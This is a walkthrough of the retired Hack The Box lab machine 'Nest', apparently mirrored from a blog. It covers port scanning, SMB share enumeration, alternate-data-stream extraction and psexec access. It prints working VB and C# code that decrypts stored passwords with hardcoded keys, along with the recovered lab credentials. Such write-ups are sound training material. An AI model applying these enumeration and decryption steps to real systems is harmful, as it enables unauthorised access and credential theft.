Nest: Hack The Box Walkthrough
source link: https://hackso.me/nest-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of Nest, a retired vulnerable VM created by VbScrub , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
On this post
- Information Gathering
- Decrypting that “password” in
RU_config.xml
- Decrypting that “password” in
-
- Alternate Data Stream
- Decrypting that “password” in
Ldap.conf
Background
Nest is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.178 --rate=700 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-28 08:39:18 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 4386/tcp on 10.10.10.178 Discovered open port 445/tcp on 10.10.10.178
4386/tcp
looks interesting. I wonder what it it. Let’s do one better with nmap
scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p445,4386 -A --reason 10.10.10.178 -oN nmap.txt ... PORT STATE SERVICE REASON VERSION 445/tcp open microsoft-ds? syn-ack ttl 127 4386/tcp open unknown syn-ack ttl 127 | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.80%I=7%D=1/28%Time=5E2FF41E%P=x86_64-pc-linux-gnu%r(NU SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2 SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\ SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21," SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\ SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\ SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20--- SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\ SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2 SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21, SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20 SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2 SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\. SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2 SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2 SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");
Interesting stuff going on at 4386/tcp
but I still don’t know what service is that. Well, since SMB is available, let’s see if there are any file shares worth exploring using smbmap
.
# smbmap -H 10.10.10.178 -u guest -R [+] Finding open SMB ports.... [+] User SMB session established on 10.10.10.178... [+] IP: 10.10.10.178:445 Name: 10.10.10.178 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share . dr--r--r-- 0 Wed Aug 7 22:53:46 2019 . dr--r--r-- 0 Wed Aug 7 22:53:46 2019 .. dr--r--r-- 0 Wed Aug 7 22:58:07 2019 IT dr--r--r-- 0 Mon Aug 5 21:53:41 2019 Production dr--r--r-- 0 Mon Aug 5 21:53:50 2019 Reports dr--r--r-- 0 Wed Aug 7 19:07:51 2019 Shared Data READ ONLY .\ dr--r--r-- 0 Wed Aug 7 22:53:46 2019 . dr--r--r-- 0 Wed Aug 7 22:53:46 2019 .. dr--r--r-- 0 Wed Aug 7 22:58:07 2019 IT dr--r--r-- 0 Mon Aug 5 21:53:41 2019 Production dr--r--r-- 0 Mon Aug 5 21:53:50 2019 Reports dr--r--r-- 0 Wed Aug 7 19:07:51 2019 Shared .\Shared\ dr--r--r-- 0 Wed Aug 7 19:07:51 2019 . dr--r--r-- 0 Wed Aug 7 19:07:51 2019 .. dr--r--r-- 0 Wed Aug 7 19:07:33 2019 Maintenance dr--r--r-- 0 Wed Aug 7 19:08:07 2019 Templates .\Shared\Maintenance\ dr--r--r-- 0 Wed Aug 7 19:07:33 2019 . dr--r--r-- 0 Wed Aug 7 19:07:33 2019 .. -r--r--r-- 48 Wed Aug 7 19:07:32 2019 Maintenance Alerts.txt .\Shared\Templates\ dr--r--r-- 0 Wed Aug 7 19:08:07 2019 . dr--r--r-- 0 Wed Aug 7 19:08:07 2019 .. dr--r--r-- 0 Wed Aug 7 19:08:10 2019 HR dr--r--r-- 0 Wed Aug 7 19:08:07 2019 Marketing .\Shared\Templates\HR\ dr--r--r-- 0 Wed Aug 7 19:08:10 2019 . dr--r--r-- 0 Wed Aug 7 19:08:10 2019 .. -r--r--r-- 425 Wed Aug 7 22:55:36 2019 Welcome Email.txt IPC$ NO ACCESS Remote IPC Secure$ NO ACCESS . dr--r--r-- 0 Sat Jan 25 23:04:21 2020 . dr--r--r-- 0 Sat Jan 25 23:04:21 2020 .. dr--r--r-- 0 Fri Aug 9 15:08:23 2019 Administrator dr--r--r-- 0 Sun Jan 26 07:21:44 2020 C.Smith dr--r--r-- 0 Thu Aug 8 17:03:29 2019 L.Frost dr--r--r-- 0 Thu Aug 8 17:02:56 2019 R.Thompson dr--r--r-- 0 Wed Aug 7 22:56:02 2019 TempUser Users READ ONLY .\ dr--r--r-- 0 Sat Jan 25 23:04:21 2020 . dr--r--r-- 0 Sat Jan 25 23:04:21 2020 .. dr--r--r-- 0 Fri Aug 9 15:08:23 2019 Administrator dr--r--r-- 0 Sun Jan 26 07:21:44 2020 C.Smith dr--r--r-- 0 Thu Aug 8 17:03:29 2019 L.Frost dr--r--r-- 0 Thu Aug 8 17:02:56 2019 R.Thompson dr--r--r-- 0 Wed Aug 7 22:56:02 2019 TempUser
Let’s check out Maintenance Alerts.txt
and Welcome Email.txt
like so.
# smbclient -Uguest% //10.10.10.178/Data
Enter into the respective folders to get them files. First one.
Maintenance Alerts.txt
There is currently no scheduled maintenance work
And the next one.
Welcome Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you HR
Looks like we have ourselves the first pair of credentials ( TempUser:welcome2019
)! Time to dig deeper into SMB…
# smbmap -H 10.10.10.178 -u TempUser -p welcome2019 -R [+] Finding open SMB ports.... [+] User SMB session established on 10.10.10.178... [+] IP: 10.10.10.178:445 Name: 10.10.10.178 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share . dr--r--r-- 0 Wed Aug 7 22:53:46 2019 . dr--r--r-- 0 Wed Aug 7 22:53:46 2019 .. dr--r--r-- 0 Wed Aug 7 22:58:07 2019 IT dr--r--r-- 0 Mon Aug 5 21:53:41 2019 Production dr--r--r-- 0 Mon Aug 5 21:53:50 2019 Reports dr--r--r-- 0 Wed Aug 7 19:07:51 2019 Shared Data READ ONLY .\ dr--r--r-- 0 Wed Aug 7 22:53:46 2019 . dr--r--r-- 0 Wed Aug 7 22:53:46 2019 .. dr--r--r-- 0 Wed Aug 7 22:58:07 2019 IT dr--r--r-- 0 Mon Aug 5 21:53:41 2019 Production dr--r--r-- 0 Mon Aug 5 21:53:50 2019 Reports dr--r--r-- 0 Wed Aug 7 19:07:51 2019 Shared .\IT\ dr--r--r-- 0 Wed Aug 7 22:58:07 2019 . dr--r--r-- 0 Wed Aug 7 22:58:07 2019 .. dr--r--r-- 0 Wed Aug 7 22:58:07 2019 Archive dr--r--r-- 0 Wed Aug 7 22:59:34 2019 Configs dr--r--r-- 0 Wed Aug 7 22:08:30 2019 Installs dr--r--r-- 0 Sun Jan 26 00:09:13 2020 Reports dr--r--r-- 0 Mon Aug 5 22:33:51 2019 Tools .\IT\Configs\ dr--r--r-- 0 Wed Aug 7 22:59:34 2019 . dr--r--r-- 0 Wed Aug 7 22:59:34 2019 .. dr--r--r-- 0 Wed Aug 7 19:20:13 2019 Adobe dr--r--r-- 0 Tue Aug 6 11:16:34 2019 Atlas dr--r--r-- 0 Tue Aug 6 13:27:08 2019 DLink dr--r--r-- 0 Wed Aug 7 19:23:26 2019 Microsoft dr--r--r-- 0 Wed Aug 7 19:33:54 2019 NotepadPlusPlus dr--r--r-- 0 Wed Aug 7 20:01:13 2019 RU Scanner dr--r--r-- 0 Tue Aug 6 13:27:09 2019 Server Manager .\IT\Configs\Adobe\ dr--r--r-- 0 Wed Aug 7 19:20:13 2019 . dr--r--r-- 0 Wed Aug 7 19:20:13 2019 .. -r--r--r-- 246 Wed Aug 7 19:20:13 2019 editing.xml -r--r--r-- 0 Wed Aug 7 19:20:09 2019 Options.txt -r--r--r-- 258 Wed Aug 7 19:20:09 2019 projects.xml -r--r--r-- 1274 Wed Aug 7 19:20:09 2019 settings.xml .\IT\Configs\Atlas\ dr--r--r-- 0 Tue Aug 6 11:16:34 2019 . dr--r--r-- 0 Tue Aug 6 11:16:34 2019 .. -r--r--r-- 1369 Tue Aug 6 11:18:38 2019 Temp.XML .\IT\Configs\Microsoft\ dr--r--r-- 0 Wed Aug 7 19:23:26 2019 . dr--r--r-- 0 Wed Aug 7 19:23:26 2019 .. -r--r--r-- 4598 Wed Aug 7 19:23:26 2019 Options.xml .\IT\Configs\NotepadPlusPlus\ dr--r--r-- 0 Wed Aug 7 19:33:54 2019 . dr--r--r-- 0 Wed Aug 7 19:33:54 2019 .. -r--r--r-- 6451 Wed Aug 7 23:01:25 2019 config.xml -r--r--r-- 2108 Wed Aug 7 23:00:36 2019 shortcuts.xml .\IT\Configs\RU Scanner\ dr--r--r-- 0 Wed Aug 7 20:01:13 2019 . dr--r--r-- 0 Wed Aug 7 20:01:13 2019 .. -r--r--r-- 270 Thu Aug 8 19:49:37 2019 RU_config.xml .\Shared\ dr--r--r-- 0 Wed Aug 7 19:07:51 2019 . dr--r--r-- 0 Wed Aug 7 19:07:51 2019 .. dr--r--r-- 0 Wed Aug 7 19:07:33 2019 Maintenance dr--r--r-- 0 Wed Aug 7 19:08:07 2019 Templates .\Shared\Maintenance\ dr--r--r-- 0 Wed Aug 7 19:07:33 2019 . dr--r--r-- 0 Wed Aug 7 19:07:33 2019 .. -r--r--r-- 48 Wed Aug 7 19:07:32 2019 Maintenance Alerts.txt .\Shared\Templates\ dr--r--r-- 0 Wed Aug 7 19:08:07 2019 . dr--r--r-- 0 Wed Aug 7 19:08:07 2019 .. dr--r--r-- 0 Wed Aug 7 19:08:10 2019 HR dr--r--r-- 0 Wed Aug 7 19:08:07 2019 Marketing .\Shared\Templates\HR\ dr--r--r-- 0 Wed Aug 7 19:08:10 2019 . dr--r--r-- 0 Wed Aug 7 19:08:10 2019 .. -r--r--r-- 425 Wed Aug 7 22:55:36 2019 Welcome Email.txt IPC$ NO ACCESS Remote IPC . dr--r--r-- 0 Wed Aug 7 23:08:12 2019 . dr--r--r-- 0 Wed Aug 7 23:08:12 2019 .. dr--r--r-- 0 Wed Aug 7 19:40:25 2019 Finance dr--r--r-- 0 Wed Aug 7 23:08:12 2019 HR dr--r--r-- 0 Thu Aug 8 10:59:25 2019 IT Secure$ READ ONLY .\ dr--r--r-- 0 Wed Aug 7 23:08:12 2019 . dr--r--r-- 0 Wed Aug 7 23:08:12 2019 .. dr--r--r-- 0 Wed Aug 7 19:40:25 2019 Finance dr--r--r-- 0 Wed Aug 7 23:08:12 2019 HR dr--r--r-- 0 Thu Aug 8 10:59:25 2019 IT . dr--r--r-- 0 Sat Jan 25 23:04:21 2020 . dr--r--r-- 0 Sat Jan 25 23:04:21 2020 .. dr--r--r-- 0 Fri Aug 9 15:08:23 2019 Administrator dr--r--r-- 0 Sun Jan 26 07:21:44 2020 C.Smith dr--r--r-- 0 Thu Aug 8 17:03:29 2019 L.Frost dr--r--r-- 0 Thu Aug 8 17:02:56 2019 R.Thompson dr--r--r-- 0 Wed Aug 7 22:56:02 2019 TempUser Users READ ONLY .\ dr--r--r-- 0 Sat Jan 25 23:04:21 2020 . dr--r--r-- 0 Sat Jan 25 23:04:21 2020 .. dr--r--r-- 0 Fri Aug 9 15:08:23 2019 Administrator dr--r--r-- 0 Sun Jan 26 07:21:44 2020 C.Smith dr--r--r-- 0 Thu Aug 8 17:03:29 2019 L.Frost dr--r--r-- 0 Thu Aug 8 17:02:56 2019 R.Thompson dr--r--r-- 0 Wed Aug 7 22:56:02 2019 TempUser .\TempUser\ dr--r--r-- 0 Wed Aug 7 22:56:02 2019 . dr--r--r-- 0 Wed Aug 7 22:56:02 2019 .. -r--r--r-- 0 Wed Aug 7 22:56:02 2019 New Text Document.txt
Indeed. The new credentials opened doors to more readable files. Who knows what we can find from the configuration files?
RU_config.xml
<?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> </ConfigFile>
We have a base64
-encoded encrypted password. And this history of opened files in NotepadPlusPlus.
config.xml
... <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History>
What do we have when we navigate to //10.10.10.178/Secure$/IT/Carl
?
Decrypting that “password” in RU_config.xml
Opening Module1.vb
provides us the first clue.
Module1.vb
Module Module1 Sub Main() Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml") Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)} End Sub End Module
Using .NET Fiddler I was able to decrypt the password with the following Visual Basic code.
Imports System Imports System.Text Imports System.Security.Cryptography Public Module Module1 Public Class Utils Public Shared Function GetLogFilePath() As String Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt") End Function Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function Encrypt(ByVal plainText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue) Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes) Using memoryStream As New IO.MemoryStream() Using cryptoStream As New CryptoStream(memoryStream, _ encryptor, _ CryptoStreamMode.Write) cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length) cryptoStream.FlushFinalBlock() Dim cipherTextBytes As Byte() = memoryStream.ToArray() memoryStream.Close() cryptoStream.Close() Return Convert.ToBase64String(cipherTextBytes) End Using End Using End Function Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue) Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes) Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes) Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read) Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length) Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length) memoryStream.Close() cryptoStream.Close() Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount) Return plainText End Function End Class Public Sub Main() Dim password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=") Console.WriteLine(password) End Sub End Module
The password is xRxRxPANCAK3SxRxRx
.
Getting user.txt
Indeed, with c.smith
’s password we have access to more files, including user.txt
.
Users READ ONLY .\ dr--r--r-- 0 Wed Jan 29 02:00:30 2020 . dr--r--r-- 0 Wed Jan 29 02:00:30 2020 .. dr--r--r-- 0 Fri Aug 9 15:08:23 2019 Administrator dr--r--r-- 0 Sun Jan 26 07:21:44 2020 C.Smith dr--r--r-- 0 Thu Aug 8 17:03:29 2019 L.Frost dr--r--r-- 0 Thu Aug 8 17:02:56 2019 R.Thompson dr--r--r-- 0 Wed Aug 7 22:56:02 2019 TempUser .\C.Smith\ dr--r--r-- 0 Sun Jan 26 07:21:44 2020 . dr--r--r-- 0 Sun Jan 26 07:21:44 2020 .. dr--r--r-- 0 Thu Aug 8 23:06:17 2019 HQK Reporting -r--r--r-- 32 Sun Jan 26 07:21:44 2020 user.txt .\C.Smith\HQK Reporting\ dr--r--r-- 0 Thu Aug 8 23:06:17 2019 . dr--r--r-- 0 Thu Aug 8 23:06:17 2019 .. dr--r--r-- 0 Fri Aug 9 12:18:42 2019 AD Integration Module -r--r--r-- 0 Thu Aug 8 23:08:16 2019 Debug Mode Password.txt -r--r--r-- 249 Thu Aug 8 23:09:05 2019 HQK_Config_Backup.xml .\C.Smith\HQK Reporting\AD Integration Module\ dr--r--r-- 0 Fri Aug 9 12:18:42 2019 . dr--r--r-- 0 Fri Aug 9 12:18:42 2019 .. -r--r--r-- 17408 Wed Aug 7 23:42:49 2019 HqkLdap.exe
Privilege Escalation
All that’s left is the unknown service at 4386/tcp
. I was able to connect to the service alright.
One thing to take note is enable CRLF as newline because of hello Microsoft Windows . Something struck me about the service was the feature to enable debug mode with additional commands.
Besides the user.txt
, we also have “Debug Mode Password.txt” above. But it has a size of zero, I hear you asking. Enter the allinfo
command in smbclient
.
Alternate Data Stream
When you see a file having a size of zero but you know something interesting is going on with that file, chances are the interesting data is stored in an alternate data stream or ADS.
What do we have here? A data stream of 15 bytes? Let’s grab that!
I think we have the DEBUG password.
Indeed.
It didn’t take me long to discover another encrypted password.
Decrypting that “password” in Ldap.conf
Earlier on I had a look at HqkLdap.exe
. It’s a .NET executable.
Using dnSpy , one can easily “disassemble” a .NET executable.
Similarly, we can decrypt the password in .NET Fiddler with the following code.
using System; using System.IO; using System.Security.Cryptography; using System.Text; namespace HqkLdap { // Token: 0x02000007 RID: 7 public class CR { // Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678 public static string DS(string EncryptedString) { if (string.IsNullOrEmpty(EncryptedString)) { return string.Empty; } return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256); } // Token: 0x06000013 RID: 19 RVA: 0x000022B0 File Offset: 0x000006B0 public static string ES(string PlainString) { if (string.IsNullOrEmpty(PlainString)) { return string.Empty; } return CR.RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256); } // Token: 0x06000014 RID: 20 RVA: 0x000022E8 File Offset: 0x000006E8 private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize) { byte[] bytes = Encoding.ASCII.GetBytes(initVector); byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue); byte[] bytes3 = Encoding.ASCII.GetBytes(plainText); Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations); byte[] bytes4 = rfc2898DeriveBytes.GetBytes(checked((int)Math.Round((double)keySize / 8.0))); ICryptoTransform transform = new AesCryptoServiceProvider { Mode = CipherMode.CBC }.CreateEncryptor(bytes4, bytes); string result; using (MemoryStream memoryStream = new MemoryStream()) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write)) { cryptoStream.Write(bytes3, 0, bytes3.Length); cryptoStream.FlushFinalBlock(); byte[] inArray = memoryStream.ToArray(); memoryStream.Close(); cryptoStream.Close(); result = Convert.ToBase64String(inArray); } } return result; } // Token: 0x06000015 RID: 21 RVA: 0x000023DC File Offset: 0x000007DC private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize) { byte[] bytes = Encoding.ASCII.GetBytes(initVector); byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue); byte[] array = Convert.FromBase64String(cipherText); Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations); checked { byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0)); ICryptoTransform transform = new AesCryptoServiceProvider { Mode = CipherMode.CBC }.CreateDecryptor(bytes3, bytes); MemoryStream memoryStream = new MemoryStream(array); CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read); byte[] array2 = new byte[array.Length + 1]; int count = cryptoStream.Read(array2, 0, array2.Length); memoryStream.Close(); cryptoStream.Close(); return Encoding.ASCII.GetString(array2, 0, count); } } // Token: 0x04000006 RID: 6 private const string K = "667912"; // Token: 0x04000007 RID: 7 private const string I = "1L1SA61493DRV53Z"; // Token: 0x04000008 RID: 8 private const string SA = "1313Rf99"; } public class Program { public static void Main() { Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")); } } }
Armed with the administrator’s password ( XtH4nkS4Pl4y1nGX
), I guess the end is near. We should be able to get a shell with Impacket’s psexec
.
Sweet.
Getting root.txt
Time for the prize, yo!
Afterthoughts
Ain’t nobody got time for the unintended way…
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK